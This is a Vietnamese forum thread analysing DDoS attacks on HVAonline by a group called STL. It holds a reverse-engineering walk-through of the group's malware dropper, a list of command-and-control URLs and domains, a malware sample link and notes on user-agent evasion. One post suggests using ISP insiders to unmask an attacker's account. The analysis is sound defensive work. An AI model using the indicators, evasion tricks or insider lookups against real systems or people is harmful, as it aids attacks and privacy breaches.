Phân tích tính chất vài trận DDoS HVA vừa qua. Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.  Theo em nghĩ, crawl cũng chỉ là 1 quá trình duyệt 1 website, parse nội dung HTML của trang đó, và lấy hết những href link trong trang, rồi tiếp tục request đến các href link đó thôi mà ? @texudo: Hình như việc thay đổi User-Agent không liên quan đến việc server tạo ra thread khác đâu bạn.]]> /hvaonline/posts/list/39641.html#245187 /hvaonline/posts/list/39641.html#245187 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. " 
Theo em hiểu thì mục đích thay đổi User Agents là để Server host website tạo một thread mới. Vì với một user khi dùng một browser để request tới Server thì họ sẽ chỉ có một User Agent duy nhất mà thôi. Việc STL thay đổi nhiều User Agents mục đích là để làm "LỤT" Server với quá nhiều thread được sinh ra....Không biết em hiểu có đúng không?
Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.  
-> Ý em là crawler khi craw vào một page nào đó, nó sẽ dectect luôn các INTERNAL Urls của site đó và tiếp tục crawl vào các INTERNAL Urls. Còn việc thay đổi User Agents thì chắc là sẽ tạo thêm hiểu quả rồi.  
Thật ra, mục đích thay đổi User-Agent (bằng cách sử dụng hàng loạt các User-Agent thông thường) là để qua mặt những hệ thống cản lọc nhằm mục đích tạo càng nhiều requests vào hệ thống của nạn nhân càng tốt. Càng nhiều requests thì càng nhiều process (hoặc threads, tuỳ mô hình) và càng tạo load, càng hao tổn tài nguyên. Nếu hệ thống không đủ tài nguyên để đáp ứng thì nó chết. DDoS thành công. Về chuyện crawl thì nó tạo tác hại hơn là đấm vô 1 URL nhất định rồi. Bởi vì nếu đấm vô 1 URL liên tục thì dễ bị nhận ra là "đồ phá hoại" và bị block bằng cách này hoặc cách khác nhưng nếu access nhiều URL (xuyên qua crawling) thì khó bị hệ thống bảo vệ phát hiện hơn. Kèm theo sự thay đổi của User-Agent, nó càng làm cho việc phát hiện khó khăn hơn. Tuy nhiên, cái gì cũng có hai mặt của nó. Protocol đưa ra lúc nào cũng có giới hạn, điểm mạnh và điểm yếu. Những hành động thật sự do con người tạo ra luôn luôn có những đặc thù mà không có bot nào có thể tạo ra được. May là quy luật tự nhiên có những thứ khiến cho cái ác và cái tà không thể đi đến chỗ cùng cực được.]]>
/hvaonline/posts/list/39641.html#245189 /hvaonline/posts/list/39641.html#245189 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. DDoS hay khui thông tin cá nhân nói xấu người chủ trì trang mạng) ai? Đánh như thế nào (đánh cảnh cáo- có thể như với vietnamnet.net, hay đánh cho sụp hẳn -như với HVA)? Đánh thật hay đánh giả? (Đánh giả để che giấu mục đích thật, sâu xa của STL)..... Các bạn thử đoán xem cần bao nhiêu người để làm cho đạt yêu cầu (của cấp trên) việc này?. Nếu ai đó nói về một vài công việc khác mà có thể STL đang làm, chúng ta có thể phải kinh ngạc về khôi lương công việc họ phải làm và thán phục về ý tưởng sâu xa, thâm hiểm của họ. Tôi nghĩ rằng STL là một tổ chức khá chặt chẽ, với biên chế hàng chục người, có thể lên đến 40-50 người, kể cả cấp trên trực tiếp. Tất nhiên STL gồm nhiều thành phần trong đó có vài bạn nhỏ VN biết ít nhiều về virus, nhưng dại dột trong cuộc sống. Nhưng cũng có những những người có trình độ khá, hay rất khá về virus, IT hoặc có những ý tưởng độc đáo, thông minh. Vì vậy không nên đánh giá STL quá thấp, như một số bạn đã viết. Cũng không nên đánh giá quá cao, để sợ. Quay trở lai các master webser-website của STL, tôi upload lên đây một số hình ảnh. Qua đó các bạn sẽ biết nhiều thông tin về chúng, trong đó có các vị trí đia lý đặt các webserver này





]]>
/hvaonline/posts/list/39641.html#245191 /hvaonline/posts/list/39641.html#245191 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Kiểm tra với PEiD, LordPE, PE Explorer:


File EXE mà mấy anh stl coder build với reloc mode làm chi cho nó bự ra vậy mấy anh stl, không biết .reloc section là gì à ? Theo hình trên, bà con thấy đó, plxzyin0fx.bin là file .exe, có overlay data với size là 0x33824, position = 0x13200. Mở plxzyin0fx.bin với 010 Editor tiếp, xem cái overlay data đó là gì:
Các bạn chú ý cái hex string và dòng text giả danh NullsoftInst đó nhé. Đây chính là điểm bắt đầu cho việc xác định và extract các PE files được nhúng trong plxzyin0fx.bin này. Và 0x13200 chính là điểm bắt đầu của Overlay data. ]]>
/hvaonline/posts/list/39641.html#245193 /hvaonline/posts/list/39641.html#245193 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Có phải máy tính của thằng ku cháu nhà em đã bị nhiễm Malware của STL hay không ? E reset lại modem thì vào lại bình thường có lẽ google ghi nhận cái địa chỉ ip của thằng ku cháu trong cache nên mới có thông báo như vậy. Em quên mất lỡ tay ghost lại máy tính cho nó.. em sẽ theo dõi thêm tình hình]]>
/hvaonline/posts/list/39641.html#245196 /hvaonline/posts/list/39641.html#245196 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Các bạn thấy đấy, stl coder đã cố che dấu chuỗi NullsoftInst trong code bằng cách chèn từng byte 0x5F vào giữa từng byte trong chuỗi hex EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 6E 73 74 20 27 02 00. Trong hàm Find_Embedded_PE_Pos, biến đếm j sẽ += 2 thay vì += 1 để skip các byte 0x5F này. Hàm Decode từng embedded PE file rất đơn giản, chỉ là:
Tóm lại, ta đã có thể viết 010 Editor script để tự động extract và decode các embedded PE files trong plxzyin0fx.bin. Script đó tui vừ post lên. Chỉ cần mở file plxzyin0fx.bin trong 010 Editor, kéo script đó vào 010 Edtior, swich lại tab plxzyin0fx.bin, run script thì ta sẽ có 3 file File1.bin, File2.bin và File3.bin. Các bạn thử IDA hay OllyDbg plxzyin0fx.bin, các bạn sẽ thấy File1.bin chính là TeamViewer_Desktop.exe, File2.bin là themeui.manifest, File3.bin không được extract ra và là file rỗng. Thật ra themeui.manifest và uxtheme.manifest cùng là 1, cùng chỉ có 1 code duy nhất, nhưng build ra khi thì scrun.dll, khi thì ClientDll.dll (stl coder rename thôi), chỉ export ra 1 hàm GetThemeUI duy nhất. TeamViewer_xxx.exe sẽ LoadLibrary uxtheme.manifest hay themeui.manifest rồi GetProcAddress, call hàm export GetThemeUI này.

Có gì thắc mắc, trao đổi, chê bai, các anh em cứ mạnh dạn post lên nhé ! Các anh stl cũng vậy, em RCE vậy được chưa mấy anh :-/ ]]>
/hvaonline/posts/list/39641.html#245197 /hvaonline/posts/list/39641.html#245197 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:
@Anh PXMMRF: Bot của STL sử dụng các browser có sẵn trên máy để DDOS hở a ?
Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. 
Theo em nghĩ, crawl cũng chỉ là 1 quá trình duyệt 1 website, parse nội dung HTML của trang đó, và lấy hết những href link trong trang, rồi tiếp tục request đến các href link đó thôi mà ? @texudo: Hình như việc thay đổi User-Agent không liên quan đến việc server tạo ra thread khác đâu bạn. 
Đúng như vậy, hay chính xác là tôi nghĩ như vậy. Các scenarios DDoS trước đây và ngay cả trong trường hơp Flash DDoS (hay còn gọi là X-Flash DDoS) vào HVA các năm trước đây, đều thông qua trình duyệt. Sự sử dụng các User Agent string trong các header của các gói tin DDoS vào mục tiêu và nhắm vào cổng HTTP 80 TCP là chứng cớ điển hình của quá trình DDoS thông qua trình duyệt Web. Khi đó trình duyệt sẽ liên tục kết nối với cổng 80 của webserver, đông thời mở rất nhiều thread (trên may client) khi kết nối Quá trình crawling trên một URL mục tiêu thì đúng như bạn nói. Chỉ có điều quá trình crawling không thưc hiện bằng manual (user click vao các link hiện diện trên URL) mà là tự động, khi check bảo mật một webserver hay khi DDoS với tốc độ chậm, châm mà sâu mà dễ gây quá tải (như anh conmale đã từng nói) Khi crawling tự đông thì máy của user cũng chiu tải năng và đăc biệt webserver cũng chịu tải rất nặng nên dễ crash. Vì sao? Vì trình duyệt của user phải mở liên tiếp nhiều URL khác nhau cùng một lúc. Còn webserver phai liên tục trong cùng một lúc chuyển nhiều URL lên cho trình quản lý web (Apache) để cho "hiện" ra tại máy user.. Việc đó làm tốn rất nhiều năng lưc (tài nguyên) của hệ thống trong một thời gian ngắn, hệ thống rất dễ quá tải hay buffer overflow. Cần phân biệt giữa file (hay process) download các file malicious image để update STL virus, như file Acrobatupdater.exe và file sẽ kich hoạt trình duyệt DDoS vào HVA. Khi RCE anh TQN cũng chưa nói rõ về file kích hoạt này. Còn trên máy thí nghiệm của tôi, như tôi đã nói, Acrobatupdater.exe không thể nào kết nối được với một master webserver nào của STL. Vì vậy tôi chưa có thông tin thưc tế về một process nào đó chịu trach nhiệm về việc kích hoạt trình duyệt DDoS vào HVA ((hoăc giả nó tự kết nối -DDoS vào HVA mà không thông qua trình duyệt). Mấy hôm nay con Acrobatupdater.exe lai chẳng chịu "active" nữa. Hì hì. Hôm trước có lúc Acrobatupdater.exe mở đến 50-60 thread kết nối với master. Đúng như em đã nói, User Agent string không có liên hệ gì với việc trình duyệt mở thread kết nối hay mở bao nhiêu thread. ]]>
/hvaonline/posts/list/39641.html#245200 /hvaonline/posts/list/39641.html#245200 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245204 /hvaonline/posts/list/39641.html#245204 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Sùng gan ông nội http://www.imageshack.us/ này quá, phải register và login vào mới xem được hình. Bà con có trang web nào upload hình mạnh, nhanh, lớn không, share cho em để em port hết mấy hình này qua ! 
Anh thử mấy cái hàng nội như http://uploadanh.com, http://up.anhso.net xem, không thì chơi photobucket tạm :D]]>
/hvaonline/posts/list/39641.html#245205 /hvaonline/posts/list/39641.html#245205 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245206 /hvaonline/posts/list/39641.html#245206 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245210 /hvaonline/posts/list/39641.html#245210 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245211 /hvaonline/posts/list/39641.html#245211 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://daily.openns.info:8080/flower.bmp (15.82.186.153): --> dead, no IP assigned. - Hosting & network: hp.com - Domain registrar: publicdomainregistry.com --> "CLIENT HOLD" violating terms and conditions. http://map.priper.info:8080/flower.bmp (208.115.200.206): --> still alive, running on 8080 - Hosting & network: limestonenetworks.com - Domain registrar: www.enom.com --> "CLIENT TRANSFER PROHIBITED" still alive http://net.iadze.com/backgrounds.jpg (178.32.95.119): --> still point to this IP but host suspended - Hosting & network: santrex.net & ovh.net - Domain registrar: www.enom.com --> "CLIENT TRANSFER PROHIBITED" still alive http://sec.seamx.net:8080/flower.bmp (15.82.186.153): --> dead, no IP assigned. - Hosting & network: hp.com - Domain registrar: www.sh3lls.net --> "SUSPENDED" violating terms and conditions. http://find.instu.net/fronts.jpg & http://find.instu.net/backgrounds.jpg (67.215.65.132): --> dead, no IP assigned. - Hosting & network: theplanet.com - Domain registrar: www.sh3lls.net --> SUSPENDED violating terms and conditions. http://second.dinest.net/xc.jpg & http://second.dinest.net/xv.jpg (46.166.147.48) --> dead, no IP assigned - Hosting & network: santrex - Domain registrar: www.lovingdomains.com --> SUSPENDED violating terms and conditions. http://speed.cyline.org:443/flower.bmp & http://speed.cyline.org:443/BlueSphere.bmp & http://speed.cyline.org:443/plxzyin0fx.bmp (178.33.143.57) --> still alive, running on 443 - Hosting & network: santrex - Domain Registrar: PublicDomainRegistry.com --> CLIENT TRANSFER PROHIBITED still alive. http://poxxf.com/flash.swf & http://poxxf.com/images.gif (174.142.132.186) --> dead, no IP assigned. - Hosting & network: iweb - Domain registrar: www.sh3lls.net --> SUSPENDED violating terms and conditions. http://paxds.com/flash.swf (178.162.225.253): offline - Hosting & Network: santrex - Domain Registrar: publicdomainregistry.com --> CLIENT TRANSFER PROHIBITED still alive. safebrowser.dyndns.org (204.13.248.126 - IP of dyndns.org): host is up, drop ICMP, open port 80. --> vecebot (report at http://www.threatexpert.com/report.aspx?md5=dc56a98aaa75a66676becda742135a5b) safebrowsing.dyndns-blog.com (204.13.248.126 - IP of dyndns.org): host is up, drop ICMP, open port 80. --> vecebot (report at http://www.threatexpert.com/report.aspx?md5=dc56a98aaa75a66676becda742135a5b) fastupdate.dyndns-office.com (204.13.248.126 - IP of dyndns.org): host is up, drop ICMP, open port 80. hot.enfaqs.com (172.16.13.17 - private IP block): offline securelogin.doomdns.com (no IP): offline tongfeirou.dyndns-web.com (89.149.202.104 - server86944.santrex.net): host is up, drop ICMP, open port 80. express.blogdns.info (91.211.118.119 - IP of 0x2a Ukraine): host is up, drop ICMP, open port 80. biouzhen.dyndns-server.com (78.110.24.85 - IP of Bellnet Malta): host is up, accepted ICMP, open port 80. maowoli.dyndns-free.com (78.110.24.85 - IP of Bellnet Malta): host is up, accepted ICMP, open port 80. Màu đỏ là teo, màu xanh là còn ngáp ngáp. "Thiệt hại" lớn nhất không phải là mấy cái "masters" bị teo, mấy con zombies bị teo khá bộn và bao nhiêu công sức gầy dựng bị tan nát không biết bao nhiêu mà kể mà ở chỗ, "underground" dần dần bị kéo lên mặt đất rồi.]]> /hvaonline/posts/list/39641.html#245221 /hvaonline/posts/list/39641.html#245221 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245233 /hvaonline/posts/list/39641.html#245233 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245244 /hvaonline/posts/list/39641.html#245244 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245247 /hvaonline/posts/list/39641.html#245247 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?5w2rrwd08b8bg8r Vẫn connect tới net.iadze.com để lấy mệnh lệnh DDOS, nhưng không lấy backgrounds.jpg mà là http://net.iadze.com/showthread.php. Các bạn xem trong file tracker.cmd sẽ thấy các link của nó. File monitor.cmd để em run và capture traffic của SbieMgm_patched.dll Quay đi quay lại vẫn bao nhiêu đó, mấy anh cứ thêm mắm, thêm muối, bớt đường, bớt bột ngọt, nhưng cuối cùng, chung quy cũng một món SbieMgm.dll đó à ! Em chán re code của mấy anh quá rồi :-( Em đang tìm mẫu bot đang "đốt" HVA ta, bà con nào có share em với. Đổi gió một chút =)) ]]> /hvaonline/posts/list/39641.html#245249 /hvaonline/posts/list/39641.html#245249 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245250 /hvaonline/posts/list/39641.html#245250 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245255 /hvaonline/posts/list/39641.html#245255 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245256 /hvaonline/posts/list/39641.html#245256 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245259 /hvaonline/posts/list/39641.html#245259 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

~simon~ wrote:
-Xin lỗi chứ em không gọi là bạn được ,từ này em gọi bọn stl là bọn địch chắc đang ức chế lắm khi HVA vẫn trơ như tượng đá. -Cũng có lẽ cấp trên chỉ thị mấy chú không hạ được HVA thì tháng này cắt luơng cũng nên :)) 
Các bạn cứ thoải mái phê phán hành vi của stl. Các bác nào có tài thì góp sức với anh TQN với conmale để vạch mặt đám này. Nhưng đừng khiêu khích theo kiểu "còn lâu mới làm gì được HVA", nhất là khi mình không nằm trong BQT.]]>
/hvaonline/posts/list/39641.html#245260 /hvaonline/posts/list/39641.html#245260 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar wrote:
Phì cười, em thấy chính các bác Admin cũng mất thời gian cho việc này, hiển nhiên là ảnh hưởng đến công việc chính của mình. Thực sự các bác nghĩ công việc chính của các bác là sống chết với HVA này ?. Các bạn STL kia thì công việc chính của các bạn ấy là phá hoại rồi, em thấy công sức các bạn ấy bỏ ra để phá hoại có khi không nhiều hơn công sức các bác bỏ ra để phòng chống. 
Mình thấy có vẻ pác là người bận rộn, lo lắng đến bản thân hơi nhiều. Ở đây mọi người quan tâm đến diễn đàn mình hoạt động (học hỏi, trao đổi ...) nên mới cùng tham gia. Còn nói về "các bác Admin" thì việc "bỏ công sức" cũng đâu có gì là quá "rảnh", vì đối với "Admin", thì website của mình cũng chính là niềm vui, đứa con tinh thần của mình. Vả lại trong quá trình điều tra, bỏ ra công sức trong thời gian này mọi người cũng học được nhiều thứ. Không có gì là phí phạm và "Phì cười" cả :)]]>
/hvaonline/posts/list/39641.html#245262 /hvaonline/posts/list/39641.html#245262 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245265 /hvaonline/posts/list/39641.html#245265 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar wrote:
Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi. 
:) STL chắc chắn ko những cay cú mà là cực kỳ cay cú có khi còn hơn -:-) kiểu như bạn muốn phá ai đó ko cho người đó thăng chức (chẳng hạn) mà người đó ko những ko bị sao mà thăng chức ầm ầm và sọc xiên lại bạn ! chắc bạn cũng bt đón nhận thôi nhỉ -:-) :-)]]>
/hvaonline/posts/list/39641.html#245266 /hvaonline/posts/list/39641.html#245266 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar wrote:
Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi. 
Bạn có giỏi hoặc thích thảo luận về kỹ thuật thì ý kiến ý kò đừng ý kiến kiểu này. Bạn có biết thái độ của STL là gì không?Hay bạn là bạn của STL? Lặn đi cho nước nó trong.]]>
/hvaonline/posts/list/39641.html#245267 /hvaonline/posts/list/39641.html#245267 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar wrote:
Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi. 
...Các bác ấy không biết được STL, tôi không biết, bạn không biết, thế thì sao? Đây là diễn đàn với tâm huyết của những quản trị, bạn biết là bạn không giúp gì được, đã vậy coi ké mà vẫn to mồm...Họ bảo vệ tâm huyết của họ, họ có cay cú, có giận dữ, có gì đi nữa thì sao? Bạn gai mắt thì mời bạn đi chỗ khác. Kẻo mọi người gai mắt thì bạn sẽ thấy nhiều thứ hơn những gì tôi viết ở đây. Không bỏ công thì đừng lên tiếng, lên tiếng thì kéo mặt xuống đất mà che cũng không kịp đâu nha. :-) Đã vào đây, xin bạn tôn trọng những người bỏ thời gian và công sức để bảo vệ nơi này. Cảm ơn. Mình cũng rảnh mồm, và thấy bạn viết rất gai mắt đó. :-) Và không phải riêng mình, nên bạn có lẽ nên lặn đi nhé. ;)]]>
/hvaonline/posts/list/39641.html#245269 /hvaonline/posts/list/39641.html#245269 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

~simon~ wrote:
-Xin lỗi chứ em không gọi là bạn được ,từ này em gọi bọn stl là bọn địch chắc đang ức chế lắm khi HVA vẫn trơ như tượng đá. -Cũng có lẽ cấp trên chỉ thị mấy chú không hạ được HVA thì tháng này cắt luơng cũng nên :)) 
@~simon~ : nói hay quá kơ, đùng foc' ý mình hì hì. thương mấy "anh" stl quá mà ứ biết các anh đâu để iem gởi tặng mấy thùng mì tom loại miliket có hình "một lũ lợn" he he . em đời sống khó khăn, bận chăn chu kắt kỏ + công việc đồng áng suốt ngày vậy mà nghe anh TQN giải mã RC, anh conmale anh hùng xung chận, oánh đông dẹp bắc giảm tải server, anh PXMMRF thì forensic truy tìm thủ phạm .v.v. cả nước hồi hộp, bốn bể mong chờ . ôi hay như film trinh thám . thật tuyệt vời nên em bỏ cả ruộng vườn lên theo dõi suốt ngày. hay ghê cơ. chúc các anh sức khoẻ để chiến đấu với các "anh" slt nha. chụt chịt moak :-* -:|- ]]>
/hvaonline/posts/list/39641.html#245270 /hvaonline/posts/list/39641.html#245270 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245274 /hvaonline/posts/list/39641.html#245274 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity wrote:
Em thấy các bác nên nghiêng về kỹ thuật chút , tuy đọc không hiểu mấy mà thấy a TQN vừa phân tích vừa vạch trần STL thấy cũng thú vị , ngày nào cũng phải lên coi "update tin tức" :P. P/S VietNamNet vào 23h15 e thấy chậm quá , chắc đang bị đấm túi bụi . 
ơ hay cái bác này lạ nhở :D ( mắng êu tí :P). a) bác download các con virus của bon stl về (các anh quản lý đã cho link từ đời nào rùi mà ) b) bác decode chúng ra (rce) xem xem bọn viruts đó có hành động dog ( em nhầm ddos ) như thế nào ?? cách thay đổi User Agents và fake Uagent ra sao để lừa hệ thống lọc của HVA .và update các lệnh từ con "master webserver" nào chứa bọn các pigs chờ của bọn stl. c) bác download các loại tranh ảnh pigs chờ của đám "mèo què, mèo mù, mèo trột" stl về ..lại RC nó ra mà xem cái lõi nó viết gì và mục đích gì? ra lệnh kết nối ra làm sao để bọn vitut' mèo què ddog HVA ? d) từ đó bác biết được "master webserver" nuôi dưỡng bọn pigs => bác biết được thông tin của con server đó nằm ở đâu bằng ba cái lệnh cơ bản và nâng cao, hoặc SE của riêng bạn d) đó ..câu chuyện chỉ có thế của đám mèo què stl thế thôi. mỗi ngày bọn chúng có thể (mà khả năng ít lắm ) ngồi bóp chim nhau, hoặc tự tay póp dái cố vắt cái óc đậu phụ của bọn chúng xem có thiết kế được kiểu ...fa' hoại nào khác ko ?? ho' ho' . e) quan trọng là nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ....né đòn ra làm sao ?hì hì. làm sao để balance server ? ( ví dụ như config rounter nhu' the' nao? mo rong bang thong ? thay doi policies can, loc .v.v. contact , hoac dap chet bon master server kia ra sao ? fan ung' nhanh cần fai? lam gi ? abc..v.v.v ) ui, cái này khó và hay lắm anh kể cho tui em nghe nha anh . :P -> luu ý thì các anh TQN,conmale, PXMMRF cung da lưu ý rùi, minh xin nhắc lại là có làm gì với đám vitut' kia thi cân thận ko lại ...tự ddos HVA lúc nào ứ biết :P tèo teo .. f) việc liên đới bọn stl này với những thông tin và thông số kỹ thuật, thậm chí cả cách code và loại tư tưởng mà bạn dò được, thế là mình có mấy chục % hiểu và biết bọn sư tổ lợn ( stl ) là ai mà . -:|- iêu bạn và ôm các anh HVA -:|- ]]>
/hvaonline/posts/list/39641.html#245277 /hvaonline/posts/list/39641.html#245277 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi wrote:
e) quan trọng là nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ....né đòn ra làm sao ?hì hì. làm sao để balance server ? ( ví dụ như config rounter nhu' the' nao? mo rong bang thong ? thay doi policies can, loc .v.v. contact , hoac dap chet bon master server kia ra sao ? fan ung' nhanh cần fai? lam gi ? abc..v.v.v ) ui, cái này khó và hay lắm anh kể cho tui em nghe nha anh . :P  
Câu "nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ...." nghe có cứ ................. :D Đọc kỹ sẽ thấy anh nói hết rồi mà. - Cách triệt để nhât là phải tiêu diệt nguồn DDoS trước khi nghĩ đến biện pháp chống -> cái này thuộc về anh TQN và các anh em khác bằng cách RCE code Virus của STL và gửi report đến các hãng diệt virus -> Diệt được vô số Bot. nếu có 10 con thì diệt được 9 hoặc 8 con là đã giúp cho HVA giảm được 80%. - Sử dụng thêm 1 Server ở EU có băng thông 1 Gbps <-- cái này khá tốt. tác dụng thì khỏi phải bàn, còn về việc load balance thì cũng giống như trước đây HVA chạy 2 server, 1 ở JAPAN và 1 ở US. - HVA không hack các server khác. vì anh conmale không thích "break laws". vì thế nên có thể là đã viết email contact với bên cung cấp dịch vụ của STL. Còn thêm các biện pháp chống khác thì với chúng ta thì với điều kiện đang có nếu Sờ Ti Lợn tấn công vào thì chắc cũng chỉ nằm yên đợi chết hoặc trông chờ vào Government ;-) ? chứ không có đủ điều kiện để kiếm đâu ra nhiều server khủng và đặt nhiều nơi trên thế giới như HVA. Phần cản lọc chắc là liên hệ với ISP có quyền và khả năng. vì giả sử cái server con con của chúng ta mà bị DDoS có set firewall cho Deni hết hay Ban hết mấy cái IP thì đống Bot kia nó cứ DDoS vào chắc cũng bị "ngập". nên chắc phải liên hệ và có sự giúp đỡ của ISP.

kutruoi wrote:
f) việc liên đới bọn stl này với những thông tin và thông số kỹ thuật, thậm chí cả cách code và loại tư tưởng mà bạn dò được, thế là mình có mấy chục % hiểu và biết bọn sư tổ lợn ( stl ) là ai mà .  
Bọn STL này là 1 nhóm code. vì vậy nhiều thằng code thối lắm. vì thế nên có đọc code cũng khó lắm mà biết được thằng nào code. không thể có được mấy chục % nhờ RCE code của bọn này. vì nếu tôi code 1 chương trình thế nào thì thằng bạn tôi học cùng thầy giáo cũng sẽ code gần giống thậm chí code giống như vậy, ngoài ra đa số STL đều lên mạng lấy code về đạo đạo, nên có thể thấy mấy thằng này không có tư duy, mà code theo kiểu chắp chắp vá vá như vá áo rách chứ không may hẳn từ đầu đến cuối 1 cái áo. Có thêm vụ có IP của STL nữa + thành viên của HVA rất đông, chắc chắn có người làm cho các ISP lớn nên chắc không khó để có chính xác thông tin của tài khoản đăng ký ADSL đó. từ đó cũng có thể lần ra được vô số. vì các thông tin cung cấp public trên đấy chỉ là 1 phần nhỏ, chứ không phải tất cả các thông tin mà các anh thu thập được đều post lên đây hết]]>
/hvaonline/posts/list/39641.html#245283 /hvaonline/posts/list/39641.html#245283 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245285 /hvaonline/posts/list/39641.html#245285 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong wrote:

kutruoi wrote:
e) quan trọng là nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ....né đòn ra làm sao ?hì hì. làm sao để balance server ? ( ví dụ như config rounter nhu' the' nao? mo rong bang thong ? thay doi policies can, loc .v.v. contact , hoac dap chet bon master server kia ra sao ? fan ung' nhanh cần fai? lam gi ? abc..v.v.v ) ui, cái này khó và hay lắm anh kể cho tui em nghe nha anh . :P  
Câu "nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ...." nghe có cứ ................. :D Đọc kỹ sẽ thấy anh nói hết rồi mà. - Cách triệt để nhât là phải tiêu diệt nguồn DDoS trước khi nghĩ đến biện pháp chống -> cái này thuộc về anh TQN và các anh em khác bằng cách RCE code Virus của STL và gửi report đến các hãng diệt virus -> Diệt được vô số Bot. nếu có 10 con thì diệt được 9 hoặc 8 con là đã giúp cho HVA giảm được 80%. - Sử dụng thêm 1 Server ở EU có băng thông 1 Gbps <-- cái này khá tốt. tác dụng thì khỏi phải bàn, còn về việc load balance thì cũng giống như trước đây HVA chạy 2 server, 1 ở JAPAN và 1 ở US. - HVA không hack các server khác. vì anh conmale không thích "break laws". vì thế nên có thể là đã viết email contact với bên cung cấp dịch vụ của STL. Còn thêm các biện pháp chống khác thì với chúng ta thì với điều kiện đang có nếu Sờ Ti Lợn tấn công vào thì chắc cũng chỉ nằm yên đợi chết hoặc trông chờ vào Government ;-) ? chứ không có đủ điều kiện để kiếm đâu ra nhiều server khủng và đặt nhiều nơi trên thế giới như HVA. Phần cản lọc chắc là liên hệ với ISP có quyền và khả năng. vì giả sử cái server con con của chúng ta mà bị DDoS có set firewall cho Deni hết hay Ban hết mấy cái IP thì đống Bot kia nó cứ DDoS vào chắc cũng bị "ngập". nên chắc phải liên hệ và có sự giúp đỡ của ISP.

kutruoi wrote:
f) việc liên đới bọn stl này với những thông tin và thông số kỹ thuật, thậm chí cả cách code và loại tư tưởng mà bạn dò được, thế là mình có mấy chục % hiểu và biết bọn sư tổ lợn ( stl ) là ai mà .  
